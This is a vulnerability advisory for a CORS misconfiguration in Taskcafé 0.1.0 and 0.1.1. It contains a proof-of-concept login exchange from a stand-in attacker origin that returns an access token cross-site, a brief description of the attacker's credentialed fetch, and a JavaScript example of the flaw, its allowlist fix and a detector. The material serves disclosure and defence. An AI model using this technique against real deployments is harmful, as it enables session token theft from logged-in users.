# Exploit Title: Taskcafé 0.1.0 and 0.1.1 - Cross-Origin Resource Sharing (CORS) Misconfiguration
# Date: 2020-09-02
# Exploit Author: Mufaddal Masalawala
# Vendor Homepage: https://github.com/JordanKnott/
# Software Link: https://github.com/JordanKnott/taskcafe
# Version: 0.1.0 and 0.1.1
# Tested on: Kali Linux 2020.3

# POC:
The web application does not validate the Origin request header: whatever origin the request carries is echoed back in Access-Control-Allow-Origin, together with Access-Control-Allow-Credentials: true. In this configuration any website can issue requests that the browser sends with the user's cookies and then read the responses. Trusting arbitrary origins effectively disables the same-origin policy for this application and gives third-party sites two-way interaction with it.

Two details of the exchange below matter for exploitability. The request is sent with Content-Type: text/plain, which makes it a CORS "simple request", so the browser issues the POST directly, cookies included, without a preflight OPTIONS check. The Set-Cookie header in the response sets refreshToken with HttpOnly but without a SameSite attribute, so whether the browser attaches that cookie to a cross-site request depends on the browser's default SameSite policy. When the request is accepted, the attacker's page can read the JSON body, including the accessToken; HttpOnly does not protect that token because it is returned in the response body rather than in a cookie.

# REQUEST:
POST /auth/login HTTP/1.1
Host: 10.20.175.152:3333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.20.175.152:3333/login
Content-Type: text/plain;charset=UTF-8
Origin: http://attacker-website.com
Content-Length: 43
Connection: close
Cookie: refreshToken=c00f94f3-c151-4e13-8084-ea160d94e584

{"username":"XXXX","password":"XXXXXX"}

# RESPONSE:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://attacker-website.com
Access-Control-Expose-Headers: Link
Content-Type: application/json
Set-Cookie: refreshToken=9048c8fd-0f7c-4c9d-9e88-2cd9f7a25d61; Expires=Thu, 03 Sep 2020 04:22:10 GMT; HttpOnly
Vary: Origin
Date: Wed, 02 Sep 2020 04:22:10 GMT
Content-Length: 271
Connection: close

{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI4YmRhMmY5ZS1iM2E3LTRmNzgtOTQ2Ny05YWZmNGM0OGFkZTAiLCJyZXN0cmljdGVkIjoidW5yZXN0cmljdGVkIiwib3JnUm9sZSI6Im1lbWJlciIsImV4cCI6MTU5OTAyMDUzNX0.eDYvNvXRf6CKULCOrMLAtKnUek9Y8IP9YnVXRAR74gE","isInstalled":false}
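The following is an added example, written for this page and not code from Taskcafé or from the advisory's author. It models the header behaviour seen in the exchange above (any Origin echoed back with credentials allowed), the exact-match allowlist a maintainer would use to fix it, and the check a tester runs over a captured response to decide whether the finding is real. The host and the attacker origin are taken from the request/response above; ALLOWED_ORIGINS, the function names and the header-parsing helper are assumptions made for illustration.

```javascript
// Added example for this advisory; not code from Taskcafé or from the
// original author. Header objects are lowercase-keyed throughout.
// The host and attacker origin come from the advisory; ALLOWED_ORIGINS
// and all function names are assumptions for illustration.

const ATTACKER_ORIGIN = 'http://attacker-website.com';

// Assumed allowlist: the origins the application is actually served from.
// Never put the literal string 'null' here (sandboxed iframes send it).
const ALLOWED_ORIGINS = ['http://10.20.175.152:3333'];

// Header block of the captured response from the advisory (constructed
// copy, body omitted), used as realistic input for the detector below.
const CAPTURED_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Access-Control-Allow-Credentials: true',
  'Access-Control-Allow-Origin: http://attacker-website.com',
  'Access-Control-Expose-Headers: Link',
  'Content-Type: application/json',
  'Set-Cookie: refreshToken=9048c8fd-0f7c-4c9d-9e88-2cd9f7a25d61; Expires=Thu, 03 Sep 2020 04:22:10 GMT; HttpOnly',
  'Vary: Origin',
  'Content-Length: 271',
  'Connection: close',
  '',
].join('\r\n');

// Parse a raw HTTP response header block into a lowercase-keyed object.
function parseResponseHeaders(raw) {
  const headers = {};
  for (const line of raw.split(/\r?\n/).slice(1)) { // skip the status line
    if (line.trim() === '') break;                    // blank line ends headers
    const sep = line.indexOf(':');                    // first colon only;
    if (sep === -1) continue;                         // Set-Cookie has more
    const name = line.slice(0, sep).trim().toLowerCase();
    const value = line.slice(sep + 1).trim();
    headers[name] = name in headers ? `${headers[name]}, ${value}` : value;
  }
  return headers;
}

// Vulnerable behaviour, as observed: echo any Origin and allow credentials,
// which makes every site on the internet a trusted origin.
function vulnerableCorsHeaders(origin) {
  return {
    'access-control-allow-origin': origin,
    'access-control-allow-credentials': 'true',
    'vary': 'Origin',
  };
}

// Hardened behaviour: exact-match the Origin against a fixed allowlist.
// Unknown origins get no ACAO/ACAC headers at all, so the browser withholds
// the response body from the calling page. Exact match (not startsWith or
// an unanchored regex) is what stops "http://10.20.175.152:3333.evil.example"
// from passing. Vary: Origin stays so a cache never serves one origin's
// CORS headers to another.
function hardenedCorsHeaders(origin, allowlist) {
  const headers = { vary: 'Origin' };
  if (typeof origin === 'string' && allowlist.includes(origin)) {
    headers['access-control-allow-origin'] = origin;
    headers['access-control-allow-credentials'] = 'true';
  }
  return headers;
}

// Tester's check: given the Origin that was sent and the response headers,
// would a page at that origin be allowed to read a credentialed response?
// Browsers reject "*" when credentials are included, so only an exact echo
// of the sent origin counts. true for an attacker-controlled origin is
// the finding described in this advisory.
function allowsCredentialedRead(sentOrigin, responseHeaders) {
  const acao = responseHeaders['access-control-allow-origin'];
  const acac = (responseHeaders['access-control-allow-credentials'] || '')
    .trim().toLowerCase();
  return acao === sentOrigin && acac === 'true';
}

// Stand-alone run: evaluate the captured response, then the fixed handler.
const captured = parseResponseHeaders(CAPTURED_RESPONSE);
console.log('captured response readable from attacker origin:',
  allowsCredentialedRead(ATTACKER_ORIGIN, captured));
console.log('hardened handler readable from attacker origin:',
  allowsCredentialedRead(ATTACKER_ORIGIN,
    hardenedCorsHeaders(ATTACKER_ORIGIN, ALLOWED_ORIGINS)));
```

On the browser side the attacking page needs nothing more than fetch(url, { credentials: 'include', ... }) against the application followed by response.json(); whether that read succeeds is exactly what allowsCredentialedRead evaluates from the server's headers, so running it against the captured response (true) and against the hardened handler (false) is the before/after test for the fix.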